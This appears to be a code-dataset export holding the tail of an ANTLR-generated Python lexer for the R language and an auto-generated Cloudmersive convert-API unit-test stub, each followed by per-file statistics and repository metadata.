buf.write("C\3D\3D\3D\5D\u01d7\nD\3E\3E\3E\5E\u01dc\nE\3E\3E\3E\7")
buf.write("E\u01e1\nE\fE\16E\u01e4\13E\3E\3E\3E\3E\7E\u01ea\nE\f")
buf.write("E\16E\u01ed\13E\5E\u01ef\nE\3F\3F\3G\3G\7G\u01f5\nG\f")
buf.write("G\16G\u01f8\13G\3G\3G\3H\3H\7H\u01fe\nH\fH\16H\u0201\13")
buf.write("H\3H\5H\u0204\nH\3H\3H\3H\3H\3I\5I\u020b\nI\3I\3I\3J\6")
buf.write("J\u0210\nJ\rJ\16J\u0211\3J\3J\7\u0197\u01a0\u01a9\u01f6")
buf.write("\u01ff\2K\3\3\5\4\7\5\t\6\13\7\r\b\17\t\21\n\23\13\25")
buf.write("\f\27\r\31\16\33\17\35\20\37\21!\22#\23%\24\'\25)\26+")
buf.write("\27-\30/\31\61\32\63\33\65\34\67\359\36;\37= ?!A\"C#E")
buf.write("$G%I&K\'M(O)Q*S+U,W-Y.[/]\60_\61a\62c\63e\64g\65i\66k")
buf.write("\67m8o9q:s;u\2w<y\2{\2}=\177>\u0081\2\u0083\2\u0085\2")
buf.write("\u0087\2\u0089?\u008b\2\u008d@\u008f\2\u0091A\u0093B\3")
buf.write("\2\17\4\2ZZzz\4\2NNnn\5\2\62;CHch\4\2GGgg\4\2--//\4\2")
buf.write("$$^^\4\2))^^\13\2$$))^^cdhhppttvvxx\3\2\62\65\3\2\629")
buf.write("\4\2\60\60aa\4\2C\\c|\5\2\13\13\16\16\"\"\2\u023a\2\3")
buf.write("\3\2\2\2\2\5\3\2\2\2\2\7\3\2\2\2\2\t\3\2\2\2\2\13\3\2")
buf.write("\2\2\2\r\3\2\2\2\2\17\3\2\2\2\2\21\3\2\2\2\2\23\3\2\2")
buf.write("\2\2\25\3\2\2\2\2\27\3\2\2\2\2\31\3\2\2\2\2\33\3\2\2\2")
buf.write("\2\35\3\2\2\2\2\37\3\2\2\2\2!\3\2\2\2\2#\3\2\2\2\2%\3")
buf.write("\2\2\2\2\'\3\2\2\2\2)\3\2\2\2\2+\3\2\2\2\2-\3\2\2\2\2")
buf.write("/\3\2\2\2\2\61\3\2\2\2\2\63\3\2\2\2\2\65\3\2\2\2\2\67")
buf.write("\3\2\2\2\29\3\2\2\2\2;\3\2\2\2\2=\3\2\2\2\2?\3\2\2\2\2")
buf.write("A\3\2\2\2\2C\3\2\2\2\2E\3\2\2\2\2G\3\2\2\2\2I\3\2\2\2")
buf.write("\2K\3\2\2\2\2M\3\2\2\2\2O\3\2\2\2\2Q\3\2\2\2\2S\3\2\2")
buf.write("\2\2U\3\2\2\2\2W\3\2\2\2\2Y\3\2\2\2\2[\3\2\2\2\2]\3\2")
buf.write("\2\2\2_\3\2\2\2\2a\3\2\2\2\2c\3\2\2\2\2e\3\2\2\2\2g\3")
buf.write("\2\2\2\2i\3\2\2\2\2k\3\2\2\2\2m\3\2\2\2\2o\3\2\2\2\2q")
buf.write("\3\2\2\2\2s\3\2\2\2\2w\3\2\2\2\2}\3\2\2\2\2\177\3\2\2")
buf.write("\2\2\u0089\3\2\2\2\2\u008d\3\2\2\2\2\u008f\3\2\2\2\2\u0091")
buf.write("\3\2\2\2\2\u0093\3\2\2\2\3\u0095\3\2\2\2\5\u0097\3\2\2")
buf.write("\2\7\u009a\3\2\2\2\t\u009c\3\2\2\2\13\u009e\3\2\2\2\r")
buf.write("\u00a1\3\2\2\2\17\u00a5\3\2\2\2\21\u00a7\3\2\2\2\23\u00a9")
buf.write("\3\2\2\2\25\u00ab\3\2\2\2\27\u00ad\3\2\2\2\31\u00af\3")
buf.write("\2\2\2\33\u00b1\3\2\2\2\35\u00b3\3\2\2\2\37\u00b5\3\2")
buf.write("\2\2!\u00b7\3\2\2\2#\u00ba\3\2\2\2%\u00bc\3\2\2\2\'\u00bf")
buf.write("\3\2\2\2)\u00c2\3\2\2\2+\u00c5\3\2\2\2-\u00c7\3\2\2\2")
buf.write("/\u00c9\3\2\2\2\61\u00cc\3\2\2\2\63\u00ce\3\2\2\2\65\u00d1")
buf.write("\3\2\2\2\67\u00d3\3\2\2\29\u00d6\3\2\2\2;\u00da\3\2\2")
buf.write("\2=\u00dc\3\2\2\2?\u00df\3\2\2\2A\u00e3\3\2\2\2C\u00e6")
buf.write("\3\2\2\2E\u00ef\3\2\2\2G\u00f1\3\2\2\2I\u00f3\3\2\2\2")
buf.write("K\u00f5\3\2\2\2M\u00f7\3\2\2\2O\u00fa\3\2\2\2Q\u00ff\3")
buf.write("\2\2\2S\u0103\3\2\2\2U\u0106\3\2\2\2W\u010c\3\2\2\2Y\u0113")
buf.write("\3\2\2\2[\u0115\3\2\2\2]\u011a\3\2\2\2_\u0120\3\2\2\2")
buf.write("a\u0125\3\2\2\2c\u0128\3\2\2\2e\u012c\3\2\2\2g\u0130\3")
buf.write("\2\2\2i\u0135\3\2\2\2k\u013b\3\2\2\2m\u013d\3\2\2\2o\u0141")
buf.write("\3\2\2\2q\u0143\3\2\2\2s\u014e\3\2\2\2u\u0155\3\2\2\2")
buf.write("w\u0180\3\2\2\2y\u0182\3\2\2\2{\u0184\3\2\2\2}\u0190\3")
buf.write("\2\2\2\177\u01ad\3\2\2\2\u0081\u01b4\3\2\2\2\u0083\u01c6")
buf.write("\3\2\2\2\u0085\u01d1\3\2\2\2\u0087\u01d3\3\2\2\2\u0089")
buf.write("\u01ee\3\2\2\2\u008b\u01f0\3\2\2\2\u008d\u01f2\3\2\2\2")
buf.write("\u008f\u01fb\3\2\2\2\u0091\u020a\3\2\2\2\u0093\u020f\3")
buf.write("\2\2\2\u0095\u0096\7=\2\2\u0096\4\3\2\2\2\u0097\u0098")
buf.write("\7]\2\2\u0098\u0099\7]\2\2\u0099\6\3\2\2\2\u009a\u009b")
buf.write("\7_\2\2\u009b\b\3\2\2\2\u009c\u009d\7]\2\2\u009d\n\3\2")
buf.write("\2\2\u009e\u009f\7<\2\2\u009f\u00a0\7<\2\2\u00a0\f\3\2")
buf.write("\2\2\u00a1\u00a2\7<\2\2\u00a2\u00a3\7<\2\2\u00a3\u00a4")
buf.write("\7<\2\2\u00a4\16\3\2\2\2\u00a5\u00a6\7&\2\2\u00a6\20\3")
buf.write("\2\2\2\u00a7\u00a8\7B\2\2\u00a8\22\3\2\2\2\u00a9\u00aa")
buf.write("\7`\2\2\u00aa\24\3\2\2\2\u00ab\u00ac\7/\2\2\u00ac\26\3")
buf.write("\2\2\2\u00ad\u00ae\7-\2\2\u00ae\30\3\2\2\2\u00af\u00b0")
buf.write("\7<\2\2\u00b0\32\3\2\2\2\u00b1\u00b2\7,\2\2\u00b2\34\3")
buf.write("\2\2\2\u00b3\u00b4\7\61\2\2\u00b4\36\3\2\2\2\u00b5\u00b6")
buf.write("\7@\2\2\u00b6 \3\2\2\2\u00b7\u00b8\7@\2\2\u00b8\u00b9")
buf.write("\7?\2\2\u00b9\"\3\2\2\2\u00ba\u00bb\7>\2\2\u00bb$\3\2")
buf.write("\2\2\u00bc\u00bd\7>\2\2\u00bd\u00be\7?\2\2\u00be&\3\2")
buf.write("\2\2\u00bf\u00c0\7?\2\2\u00c0\u00c1\7?\2\2\u00c1(\3\2")
buf.write("\2\2\u00c2\u00c3\7#\2\2\u00c3\u00c4\7?\2\2\u00c4*\3\2")
buf.write("\2\2\u00c5\u00c6\7#\2\2\u00c6,\3\2\2\2\u00c7\u00c8\7(")
buf.write("\2\2\u00c8.\3\2\2\2\u00c9\u00ca\7(\2\2\u00ca\u00cb\7(")
buf.write("\2\2\u00cb\60\3\2\2\2\u00cc\u00cd\7~\2\2\u00cd\62\3\2")
buf.write("\2\2\u00ce\u00cf\7~\2\2\u00cf\u00d0\7~\2\2\u00d0\64\3")
buf.write("\2\2\2\u00d1\u00d2\7\u0080\2\2\u00d2\66\3\2\2\2\u00d3")
buf.write("\u00d4\7>\2\2\u00d4\u00d5\7/\2\2\u00d58\3\2\2\2\u00d6")
buf.write("\u00d7\7>\2\2\u00d7\u00d8\7>\2\2\u00d8\u00d9\7/\2\2\u00d9")
buf.write(":\3\2\2\2\u00da\u00db\7?\2\2\u00db<\3\2\2\2\u00dc\u00dd")
buf.write("\7/\2\2\u00dd\u00de\7@\2\2\u00de>\3\2\2\2\u00df\u00e0")
buf.write("\7/\2\2\u00e0\u00e1\7@\2\2\u00e1\u00e2\7@\2\2\u00e2@\3")
buf.write("\2\2\2\u00e3\u00e4\7<\2\2\u00e4\u00e5\7?\2\2\u00e5B\3")
buf.write("\2\2\2\u00e6\u00e7\7h\2\2\u00e7\u00e8\7w\2\2\u00e8\u00e9")
buf.write("\7p\2\2\u00e9\u00ea\7e\2\2\u00ea\u00eb\7v\2\2\u00eb\u00ec")
buf.write("\7k\2\2\u00ec\u00ed\7q\2\2\u00ed\u00ee\7p\2\2\u00eeD\3")
buf.write("\2\2\2\u00ef\u00f0\7*\2\2\u00f0F\3\2\2\2\u00f1\u00f2\7")
buf.write("+\2\2\u00f2H\3\2\2\2\u00f3\u00f4\7}\2\2\u00f4J\3\2\2\2")
buf.write("\u00f5\u00f6\7\177\2\2\u00f6L\3\2\2\2\u00f7\u00f8\7k\2")
buf.write("\2\u00f8\u00f9\7h\2\2\u00f9N\3\2\2\2\u00fa\u00fb\7g\2")
buf.write("\2\u00fb\u00fc\7n\2\2\u00fc\u00fd\7u\2\2\u00fd\u00fe\7")
buf.write("g\2\2\u00feP\3\2\2\2\u00ff\u0100\7h\2\2\u0100\u0101\7")
buf.write("q\2\2\u0101\u0102\7t\2\2\u0102R\3\2\2\2\u0103\u0104\7")
buf.write("k\2\2\u0104\u0105\7p\2\2\u0105T\3\2\2\2\u0106\u0107\7")
buf.write("y\2\2\u0107\u0108\7j\2\2\u0108\u0109\7k\2\2\u0109\u010a")
buf.write("\7n\2\2\u010a\u010b\7g\2\2\u010bV\3\2\2\2\u010c\u010d")
buf.write("\7t\2\2\u010d\u010e\7g\2\2\u010e\u010f\7r\2\2\u010f\u0110")
buf.write("\7g\2\2\u0110\u0111\7c\2\2\u0111\u0112\7v\2\2\u0112X\3")
buf.write("\2\2\2\u0113\u0114\7A\2\2\u0114Z\3\2\2\2\u0115\u0116\7")
buf.write("p\2\2\u0116\u0117\7g\2\2\u0117\u0118\7z\2\2\u0118\u0119")
buf.write("\7v\2\2\u0119\\\3\2\2\2\u011a\u011b\7d\2\2\u011b\u011c")
buf.write("\7t\2\2\u011c\u011d\7g\2\2\u011d\u011e\7c\2\2\u011e\u011f")
buf.write("\7m\2\2\u011f^\3\2\2\2\u0120\u0121\7P\2\2\u0121\u0122")
buf.write("\7W\2\2\u0122\u0123\7N\2\2\u0123\u0124\7N\2\2\u0124`\3")
buf.write("\2\2\2\u0125\u0126\7P\2\2\u0126\u0127\7C\2\2\u0127b\3")
buf.write("\2\2\2\u0128\u0129\7K\2\2\u0129\u012a\7p\2\2\u012a\u012b")
buf.write("\7h\2\2\u012bd\3\2\2\2\u012c\u012d\7P\2\2\u012d\u012e")
buf.write("\7c\2\2\u012e\u012f\7P\2\2\u012ff\3\2\2\2\u0130\u0131")
buf.write("\7V\2\2\u0131\u0132\7T\2\2\u0132\u0133\7W\2\2\u0133\u0134")
buf.write("\7G\2\2\u0134h\3\2\2\2\u0135\u0136\7H\2\2\u0136\u0137")
buf.write("\7C\2\2\u0137\u0138\7N\2\2\u0138\u0139\7U\2\2\u0139\u013a")
buf.write("\7G\2\2\u013aj\3\2\2\2\u013b\u013c\7.\2\2\u013cl\3\2\2")
buf.write("\2\u013d\u013e\7\60\2\2\u013e\u013f\7\60\2\2\u013f\u0140")
buf.write("\7\60\2\2\u0140n\3\2\2\2\u0141\u0142\7\60\2\2\u0142p\3")
buf.write("\2\2\2\u0143\u0144\7\62\2\2\u0144\u0146\t\2\2\2\u0145")
buf.write("\u0147\5u;\2\u0146\u0145\3\2\2\2\u0147\u0148\3\2\2\2\u0148")
buf.write("\u0146\3\2\2\2\u0148\u0149\3\2\2\2\u0149\u014b\3\2\2\2")
buf.write("\u014a\u014c\t\3\2\2\u014b\u014a\3\2\2\2\u014b\u014c\3")
buf.write("\2\2\2\u014cr\3\2\2\2\u014d\u014f\5y=\2\u014e\u014d\3")
buf.write("\2\2\2\u014f\u0150\3\2\2\2\u0150\u014e\3\2\2\2\u0150\u0151")
buf.write("\3\2\2\2\u0151\u0153\3\2\2\2\u0152\u0154\t\3\2\2\u0153")
buf.write("\u0152\3\2\2\2\u0153\u0154\3\2\2\2\u0154t\3\2\2\2\u0155")
buf.write("\u0156\t\4\2\2\u0156v\3\2\2\2\u0157\u0159\5y=\2\u0158")
buf.write("\u0157\3\2\2\2\u0159\u015a\3\2\2\2\u015a\u0158\3\2\2\2")
buf.write("\u015a\u015b\3\2\2\2\u015b\u015c\3\2\2\2\u015c\u0160\7")
buf.write("\60\2\2\u015d\u015f\5y=\2\u015e\u015d\3\2\2\2\u015f\u0162")
buf.write("\3\2\2\2\u0160\u015e\3\2\2\2\u0160\u0161\3\2\2\2\u0161")
buf.write("\u0164\3\2\2\2\u0162\u0160\3\2\2\2\u0163\u0165\5{>\2\u0164")
buf.write("\u0163\3\2\2\2\u0164\u0165\3\2\2\2\u0165\u0167\3\2\2\2")
buf.write("\u0166\u0168\t\3\2\2\u0167\u0166\3\2\2\2\u0167\u0168\3")
buf.write("\2\2\2\u0168\u0181\3\2\2\2\u0169\u016b\5y=\2\u016a\u0169")
buf.write("\3\2\2\2\u016b\u016c\3\2\2\2\u016c\u016a\3\2\2\2\u016c")
buf.write("\u016d\3\2\2\2\u016d\u016f\3\2\2\2\u016e\u0170\5{>\2\u016f")
buf.write("\u016e\3\2\2\2\u016f\u0170\3\2\2\2\u0170\u0172\3\2\2\2")
buf.write("\u0171\u0173\t\3\2\2\u0172\u0171\3\2\2\2\u0172\u0173\3")
buf.write("\2\2\2\u0173\u0181\3\2\2\2\u0174\u0176\7\60\2\2\u0175")
buf.write("\u0177\5y=\2\u0176\u0175\3\2\2\2\u0177\u0178\3\2\2\2\u0178")
buf.write("\u0176\3\2\2\2\u0178\u0179\3\2\2\2\u0179\u017b\3\2\2\2")
buf.write("\u017a\u017c\5{>\2\u017b\u017a\3\2\2\2\u017b\u017c\3\2")
buf.write("\2\2\u017c\u017e\3\2\2\2\u017d\u017f\t\3\2\2\u017e\u017d")
buf.write("\3\2\2\2\u017e\u017f\3\2\2\2\u017f\u0181\3\2\2\2\u0180")
buf.write("\u0158\3\2\2\2\u0180\u016a\3\2\2\2\u0180\u0174\3\2\2\2")
buf.write("\u0181x\3\2\2\2\u0182\u0183\4\62;\2\u0183z\3\2\2\2\u0184")
buf.write("\u0186\t\5\2\2\u0185\u0187\t\6\2\2\u0186\u0185\3\2\2\2")
buf.write("\u0186\u0187\3\2\2\2\u0187\u0188\3\2\2\2\u0188\u0189\5")
buf.write("s:\2\u0189|\3\2\2\2\u018a\u018b\5s:\2\u018b\u018c\7k\2")
buf.write("\2\u018c\u0191\3\2\2\2\u018d\u018e\5w<\2\u018e\u018f\7")
buf.write("k\2\2\u018f\u0191\3\2\2\2\u0190\u018a\3\2\2\2\u0190\u018d")
buf.write("\3\2\2\2\u0191~\3\2\2\2\u0192\u0197\7$\2\2\u0193\u0196")
buf.write("\5\u0081A\2\u0194\u0196\n\7\2\2\u0195\u0193\3\2\2\2\u0195")
buf.write("\u0194\3\2\2\2\u0196\u0199\3\2\2\2\u0197\u0198\3\2\2\2")
buf.write("\u0197\u0195\3\2\2\2\u0198\u019a\3\2\2\2\u0199\u0197\3")
buf.write("\2\2\2\u019a\u01ae\7$\2\2\u019b\u01a0\7)\2\2\u019c\u019f")
buf.write("\5\u0081A\2\u019d\u019f\n\b\2\2\u019e\u019c\3\2\2\2\u019e")
buf.write("\u019d\3\2\2\2\u019f\u01a2\3\2\2\2\u01a0\u01a1\3\2\2\2")
buf.write("\u01a0\u019e\3\2\2\2\u01a1\u01a3\3\2\2\2\u01a2\u01a0\3")
buf.write("\2\2\2\u01a3\u01ae\7)\2\2\u01a4\u01a9\7b\2\2\u01a5\u01a8")
buf.write("\5\u0081A\2\u01a6\u01a8\n\b\2\2\u01a7\u01a5\3\2\2\2\u01a7")
buf.write("\u01a6\3\2\2\2\u01a8\u01ab\3\2\2\2\u01a9\u01aa\3\2\2\2")
buf.write("\u01a9\u01a7\3\2\2\2\u01aa\u01ac\3\2\2\2\u01ab\u01a9\3")
buf.write("\2\2\2\u01ac\u01ae\7b\2\2\u01ad\u0192\3\2\2\2\u01ad\u019b")
buf.write("\3\2\2\2\u01ad\u01a4\3\2\2\2\u01ae\u0080\3\2\2\2\u01af")
buf.write("\u01b0\7^\2\2\u01b0\u01b5\t\t\2\2\u01b1\u01b5\5\u0083")
buf.write("B\2\u01b2\u01b5\5\u0087D\2\u01b3\u01b5\5\u0085C\2\u01b4")
buf.write("\u01af\3\2\2\2\u01b4\u01b1\3\2\2\2\u01b4\u01b2\3\2\2\2")
buf.write("\u01b4\u01b3\3\2\2\2\u01b5\u0082\3\2\2\2\u01b6\u01b7\7")
buf.write("^\2\2\u01b7\u01b8\7w\2\2\u01b8\u01b9\5u;\2\u01b9\u01ba")
buf.write("\5u;\2\u01ba\u01bb\5u;\2\u01bb\u01bc\5u;\2\u01bc\u01c7")
buf.write("\3\2\2\2\u01bd\u01be\7^\2\2\u01be\u01bf\7w\2\2\u01bf\u01c0")
buf.write("\7}\2\2\u01c0\u01c1\5u;\2\u01c1\u01c2\5u;\2\u01c2\u01c3")
buf.write("\5u;\2\u01c3\u01c4\5u;\2\u01c4\u01c5\7\177\2\2\u01c5\u01c7")
buf.write("\3\2\2\2\u01c6\u01b6\3\2\2\2\u01c6\u01bd\3\2\2\2\u01c7")
buf.write("\u0084\3\2\2\2\u01c8\u01c9\7^\2\2\u01c9\u01ca\t\n\2\2")
buf.write("\u01ca\u01cb\t\13\2\2\u01cb\u01d2\t\13\2\2\u01cc\u01cd")
buf.write("\7^\2\2\u01cd\u01ce\t\13\2\2\u01ce\u01d2\t\13\2\2\u01cf")
buf.write("\u01d0\7^\2\2\u01d0\u01d2\t\13\2\2\u01d1\u01c8\3\2\2\2")
buf.write("\u01d1\u01cc\3\2\2\2\u01d1\u01cf\3\2\2\2\u01d2\u0086\3")
buf.write("\2\2\2\u01d3\u01d4\7^\2\2\u01d4\u01d6\5u;\2\u01d5\u01d7")
buf.write("\5u;\2\u01d6\u01d5\3\2\2\2\u01d6\u01d7\3\2\2\2\u01d7\u0088")
buf.write("\3\2\2\2\u01d8\u01db\7\60\2\2\u01d9\u01dc\5\u008bF\2\u01da")
buf.write("\u01dc\t\f\2\2\u01db\u01d9\3\2\2\2\u01db\u01da\3\2\2\2")
buf.write("\u01dc\u01e2\3\2\2\2\u01dd\u01e1\5\u008bF\2\u01de\u01e1")
buf.write("\5y=\2\u01df\u01e1\t\f\2\2\u01e0\u01dd\3\2\2\2\u01e0\u01de")
buf.write("\3\2\2\2\u01e0\u01df\3\2\2\2\u01e1\u01e4\3\2\2\2\u01e2")
buf.write("\u01e0\3\2\2\2\u01e2\u01e3\3\2\2\2\u01e3\u01ef\3\2\2\2")
buf.write("\u01e4\u01e2\3\2\2\2\u01e5\u01eb\5\u008bF\2\u01e6\u01ea")
buf.write("\5\u008bF\2\u01e7\u01ea\5y=\2\u01e8\u01ea\t\f\2\2\u01e9")
buf.write("\u01e6\3\2\2\2\u01e9\u01e7\3\2\2\2\u01e9\u01e8\3\2\2\2")
buf.write("\u01ea\u01ed\3\2\2\2\u01eb\u01e9\3\2\2\2\u01eb\u01ec\3")
buf.write("\2\2\2\u01ec\u01ef\3\2\2\2\u01ed\u01eb\3\2\2\2\u01ee\u01d8")
buf.write("\3\2\2\2\u01ee\u01e5\3\2\2\2\u01ef\u008a\3\2\2\2\u01f0")
buf.write("\u01f1\t\r\2\2\u01f1\u008c\3\2\2\2\u01f2\u01f6\7\'\2\2")
buf.write("\u01f3\u01f5\13\2\2\2\u01f4\u01f3\3\2\2\2\u01f5\u01f8")
buf.write("\3\2\2\2\u01f6\u01f7\3\2\2\2\u01f6\u01f4\3\2\2\2\u01f7")
buf.write("\u01f9\3\2\2\2\u01f8\u01f6\3\2\2\2\u01f9\u01fa\7\'\2\2")
buf.write("\u01fa\u008e\3\2\2\2\u01fb\u01ff\7%\2\2\u01fc\u01fe\13")
buf.write("\2\2\2\u01fd\u01fc\3\2\2\2\u01fe\u0201\3\2\2\2\u01ff\u0200")
buf.write("\3\2\2\2\u01ff\u01fd\3\2\2\2\u0200\u0203\3\2\2\2\u0201")
buf.write("\u01ff\3\2\2\2\u0202\u0204\7\17\2\2\u0203\u0202\3\2\2")
buf.write("\2\u0203\u0204\3\2\2\2\u0204\u0205\3\2\2\2\u0205\u0206")
buf.write("\7\f\2\2\u0206\u0207\3\2\2\2\u0207\u0208\bH\2\2\u0208")
buf.write("\u0090\3\2\2\2\u0209\u020b\7\17\2\2\u020a\u0209\3\2\2")
buf.write("\2\u020a\u020b\3\2\2\2\u020b\u020c\3\2\2\2\u020c\u020d")
buf.write("\7\f\2\2\u020d\u0092\3\2\2\2\u020e\u0210\t\16\2\2\u020f")
buf.write("\u020e\3\2\2\2\u0210\u0211\3\2\2\2\u0211\u020f\3\2\2\2")
buf.write("\u0211\u0212\3\2\2\2\u0212\u0213\3\2\2\2\u0213\u0214\b")
buf.write("J\3\2\u0214\u0094\3\2\2\2*\2\u0148\u014b\u0150\u0153\u015a")
buf.write("\u0160\u0164\u0167\u016c\u016f\u0172\u0178\u017b\u017e")
buf.write("\u0180\u0186\u0190\u0195\u0197\u019e\u01a0\u01a7\u01a9")
buf.write("\u01ad\u01b4\u01c6\u01d1\u01d6\u01db\u01e0\u01e2\u01e9")
buf.write("\u01eb\u01ee\u01f6\u01ff\u0203\u020a\u0211\4\tA\2\b\2")
buf.write("\2")
return buf.getvalue()
class RLexer(Lexer):
    """ANTLR-generated lexer for the R grammar (grammarFileName: R.g4).

    NOTE(review): this class is machine-generated by ANTLR 4.8 — regenerate
    it from the grammar instead of editing it by hand.
    """

    # Deserialize the serialized ATN string (built above) into the runtime
    # augmented transition network used by the lexer simulator.
    atn = ATNDeserializer().deserialize(serializedATN())

    # One DFA per ATN decision point, consumed by LexerATNSimulator below.
    decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]

    # Token type constants; indices line up with literalNames/symbolicNames.
    T__0 = 1
    T__1 = 2
    T__2 = 3
    T__3 = 4
    T__4 = 5
    T__5 = 6
    T__6 = 7
    T__7 = 8
    T__8 = 9
    T__9 = 10
    T__10 = 11
    T__11 = 12
    T__12 = 13
    T__13 = 14
    T__14 = 15
    T__15 = 16
    T__16 = 17
    T__17 = 18
    T__18 = 19
    T__19 = 20
    T__20 = 21
    T__21 = 22
    T__22 = 23
    T__23 = 24
    T__24 = 25
    T__25 = 26
    T__26 = 27
    T__27 = 28
    T__28 = 29
    T__29 = 30
    T__30 = 31
    T__31 = 32
    T__32 = 33
    T__33 = 34
    T__34 = 35
    T__35 = 36
    T__36 = 37
    T__37 = 38
    T__38 = 39
    T__39 = 40
    T__40 = 41
    T__41 = 42
    T__42 = 43
    T__43 = 44
    T__44 = 45
    T__45 = 46
    T__46 = 47
    T__47 = 48
    T__48 = 49
    T__49 = 50
    T__50 = 51
    T__51 = 52
    T__52 = 53
    T__53 = 54
    T__54 = 55
    # Named lexical token types from the grammar.
    HEX = 56
    INT = 57
    FLOAT = 58
    COMPLEX = 59
    STRING = 60
    ID = 61
    USER_OP = 62
    NL = 63
    WS = 64

    channelNames = [ u"DEFAULT_TOKEN_CHANNEL", u"HIDDEN" ]

    modeNames = [ "DEFAULT_MODE" ]

    # Literal spellings of the anonymous T__* tokens, indexed by token type.
    literalNames = [ "<INVALID>",
            "';'", "'[['", "']'", "'['", "'::'", "':::'", "'$'", "'@'",
            "'^'", "'-'", "'+'", "':'", "'*'", "'/'", "'>'", "'>='", "'<'",
            "'<='", "'=='", "'!='", "'!'", "'&'", "'&&'", "'|'", "'||'",
            "'~'", "'<-'", "'<<-'", "'='", "'->'", "'->>'", "':='", "'function'",
            "'('", "')'", "'{'", "'}'", "'if'", "'else'", "'for'", "'in'",
            "'while'", "'repeat'", "'?'", "'next'", "'break'", "'NULL'",
            "'NA'", "'Inf'", "'NaN'", "'TRUE'", "'FALSE'", "','", "'...'",
            "'.'" ]

    # Symbolic names for the named tokens, indexed by token type.
    symbolicNames = [ "<INVALID>",
            "HEX", "INT", "FLOAT", "COMPLEX", "STRING", "ID", "USER_OP",
            "NL", "WS" ]

    # Lexer rule names, including fragment rules (e.g. HEXDIGIT, ESC) that
    # never produce tokens of their own.
    ruleNames = [ "T__0", "T__1", "T__2", "T__3", "T__4", "T__5", "T__6",
                  "T__7", "T__8", "T__9", "T__10", "T__11", "T__12", "T__13",
                  "T__14", "T__15", "T__16", "T__17", "T__18", "T__19",
                  "T__20", "T__21", "T__22", "T__23", "T__24", "T__25",
                  "T__26", "T__27", "T__28", "T__29", "T__30", "T__31",
                  "T__32", "T__33", "T__34", "T__35", "T__36", "T__37",
                  "T__38", "T__39", "T__40", "T__41", "T__42", "T__43",
                  "T__44", "T__45", "T__46", "T__47", "T__48", "T__49",
                  "T__50", "T__51", "T__52", "T__53", "T__54", "HEX", "INT",
                  "HEXDIGIT", "FLOAT", "DIGIT", "EXP", "COMPLEX", "STRING",
                  "ESC", "UNICODE_ESCAPE", "OCTAL_ESCAPE", "HEX_ESCAPE",
                  "ID", "LETTER", "USER_OP", "COMMENT", "NL", "WS" ]

    grammarFileName = "R.g4"

    def __init__(self, input=None, output:TextIO = sys.stdout):
        """Create the lexer over *input*, writing diagnostics to *output*."""
        super().__init__(input, output)
        # Fails fast if the installed ANTLR runtime does not match the
        # version of the code generator (4.8).
        self.checkVersion("4.8")
        self._interp = LexerATNSimulator(self, self.atn, self.decisionsToDFA, PredictionContextCache())
        self._actions = None
        self._predicates = None
| 59.4
| 103
| 0.55592
| 5,009
| 21,978
| 2.390098
| 0.148732
| 0.148012
| 0.088707
| 0.096225
| 0.239225
| 0.142082
| 0.053625
| 0.041597
| 0.035416
| 0.030154
| 0
| 0.356833
| 0.151288
| 21,978
| 369
| 104
| 59.560976
| 0.284994
| 0.004277
| 0
| 0
| 1
| 0.287749
| 0.632221
| 0.594973
| 0
| 0
| 0
| 0
| 0
| 1
| 0.005698
| false
| 0
| 0.011396
| 0
| 0.22792
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
62b168a87b111cdc369e35fac01c3a0832840152
| 1,013
|
py
|
Python
|
test/test_get_docx_tables_request.py
|
Cloudmersive/Cloudmersive.APIClient.Python.Convert
|
dba2fe7257229ebdacd266531b3724552c651009
|
[
"Apache-2.0"
] | 3
|
2018-07-25T23:04:34.000Z
|
2021-08-10T16:43:10.000Z
|
test/test_get_docx_tables_request.py
|
Cloudmersive/Cloudmersive.APIClient.Python.Convert
|
dba2fe7257229ebdacd266531b3724552c651009
|
[
"Apache-2.0"
] | 3
|
2020-11-23T10:46:48.000Z
|
2021-12-30T14:09:34.000Z
|
test/test_get_docx_tables_request.py
|
Cloudmersive/Cloudmersive.APIClient.Python.Convert
|
dba2fe7257229ebdacd266531b3724552c651009
|
[
"Apache-2.0"
] | 2
|
2020-01-07T09:48:01.000Z
|
2020-11-23T10:47:00.000Z
|
# coding: utf-8
"""
convertapi
Convert API lets you effortlessly convert file formats and types. # noqa: E501
OpenAPI spec version: v1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import cloudmersive_convert_api_client
from cloudmersive_convert_api_client.models.get_docx_tables_request import GetDocxTablesRequest # noqa: E501
from cloudmersive_convert_api_client.rest import ApiException
class TestGetDocxTablesRequest(unittest.TestCase):
    """Unit-test stubs for the GetDocxTablesRequest model (auto-generated)."""

    def setUp(self):
        """No fixtures are needed for these stubs."""

    def tearDown(self):
        """Nothing to clean up."""

    def testGetDocxTablesRequest(self):
        """Test GetDocxTablesRequest"""
        # FIXME: construct object with mandatory attributes with example values
        # model = cloudmersive_convert_api_client.models.get_docx_tables_request.GetDocxTablesRequest()  # noqa: E501
if __name__ == '__main__':
    # Allow running this test module directly from the command line.
    unittest.main()
| 24.707317
| 117
| 0.741362
| 113
| 1,013
| 6.371681
| 0.575221
| 0.069444
| 0.122222
| 0.155556
| 0.2
| 0.15
| 0.15
| 0.15
| 0.15
| 0
| 0
| 0.013366
| 0.187562
| 1,013
| 40
| 118
| 25.325
| 0.861482
| 0.443238
| 0
| 0.214286
| 1
| 0
| 0.015326
| 0
| 0
| 0
| 0
| 0.025
| 0
| 1
| 0.214286
| false
| 0.214286
| 0.357143
| 0
| 0.642857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 1
| 0
|
0
| 6
|
62e6229f71aaf5eee528859098ed00ea62f05476
| 170
|
py
|
Python
|
source/script/FASelector_SRC/Utils/Converter.py
|
onsoim/FuzzBuilderEx
|
d0e8bada27677a0f676e92dc48aaa764ba679508
|
[
"Apache-2.0"
] | 6
|
2021-03-27T06:07:01.000Z
|
2022-03-29T04:54:03.000Z
|
source/script/FASelector_SRC/Utils/Converter.py
|
